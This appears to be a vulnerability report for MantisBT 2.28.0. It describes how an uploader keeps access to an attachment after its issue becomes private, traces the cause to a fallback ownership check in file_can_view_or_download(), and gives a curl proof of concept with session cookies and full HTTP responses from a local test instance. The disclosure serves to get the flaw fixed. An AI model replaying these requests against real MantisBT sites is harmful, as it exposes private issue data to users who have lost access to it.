| Description | MantisBT permits a user to continue listing and downloading their own attachment from an issue after that issue becomes private and direct issue access is denied.
The attachment visibility logic allows a fallback for the uploader when allow_view_own_attachments or allow_download_own_attachments is enabled. As a result, attachment access can survive loss of issue level visibility.
In the tested instance, a low-privileged reporter user uploaded a file to issue 2 while it was public. After the issue was changed to private, the same user was correctly denied access to view.php?id=2, but could still:
- list the attachment through GET /api/rest/issues/2/files
- download the same file through GET /file_download.php?file_id=11&type=bug
This creates a post-access-loss disclosure path where issue attachment content remains accessible even though the parent issue is no longer viewable.
Affected Code
- file_api.php:240
- IssueFileGetCommand.php:57
- issues_rest.php:539
- file_download.php:125
Root Cause
file_can_view_or_download() first checks normal bug-level or bugnote-level access. If that fails, it falls back to:
$t_uploaded_by_me = auth_get_current_user_id() == $p_uploader_user_id;
return $t_uploaded_by_me && $t_view_own;
This means attachment ownership is treated as sufficient for continued access, even when the user no longer has access to the issue itself. |
|---|
| Steps To Reproduce |
-
Log in as a low-privileged user.
-
Upload a file to an issue while the issue is public.
-
Change the issue to private.
-
Confirm the same user receives 403 Forbidden on the issue page.
-
Request the issue attachment listing and direct download endpoints with the same authenticated session.
-
Confirm the issue itself is blocked:
curl -i 'http://127.0.0.1:8082/view.php?id=2' \
-b 'PHPSESSID=824f757a81d6daa2babfd78f593d88e9; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=vDpDJ75wdseznutGCwiNBcTb1W7V_ZcAC-fGDVNzwmt1n5nKKkWumlNOAjv-SpUl'
Response
HTTP/1.1 403 Forbidden
- List the attachments anyway:
curl -i 'http://127.0.0.1:8082/api/rest/issues/2/files' \
-b 'PHPSESSID=824f757a81d6daa2babfd78f593d88e9; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=vDpDJ75wdseznutGCwiNBcTb1W7V_ZcAC-fGDVNzwmt1n5nKKkWumlNOAjv-SpUl'
HTTP/1.1 200 OK
Host: 127.0.0.1:8082
Date: Tue, 17 Mar 2026 09:34:14 GMT
Connection: close
X-Powered-By: PHP/8.4.7
Last-Modified: Tue, 30 Dec 2025 00:12:37 GMT
Content-Type: application/json
X-Mantis-Username: reporter
X-Mantis-LoginMethod: cookie
X-Mantis-Version: 2.28.0
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 282
{"files":[{"id":11,"reporter":{"id":2,"name":"reporter","real_name":"reporter","email":"reporter@localhost.me"},"created_at":"2026-03-17T14:15:43+05:30","filename":"issue7-curl-poc.txt","size":16,"content_type":"text\/plain; charset=us-ascii","content":"aXNzdWU3LWN1cmwtcG9jCg=="}]}
- To Download
curl -i 'http://127.0.0.1:8082/file_download.php?file_id=11&type=bug' \
-b 'PHPSESSID=824f757a81d6daa2babfd78f593d88e9; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=vDpDJ75wdseznutGCwiNBcTb1W7V_ZcAC-fGDVNzwmt1n5nKKkWumlNOAjv-SpUl'
HTTP/1.1 200 OK
Host: 127.0.0.1:8082
Date: Tue, 17 Mar 2026 09:34:33 GMT
Connection: close
X-Powered-By: PHP/8.4.7
Cache-Control: private, max-age=10800
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' data:
Expires: Tue, 17 Mar 2026 09:34:33 GMT
Last-Modified: Tue, 17 Mar 2026 08:45:43 GMT
Content-Disposition:attachment; filename*=UTF-8''issue7-curl-poc.txt; filename="issue7-curl-poc.txt"
Content-Type: text/plain; charset=us-ascii
Content-Length: 16
X-Content-Type-Options: nosniff
issue7-curl-poc
|
|---|
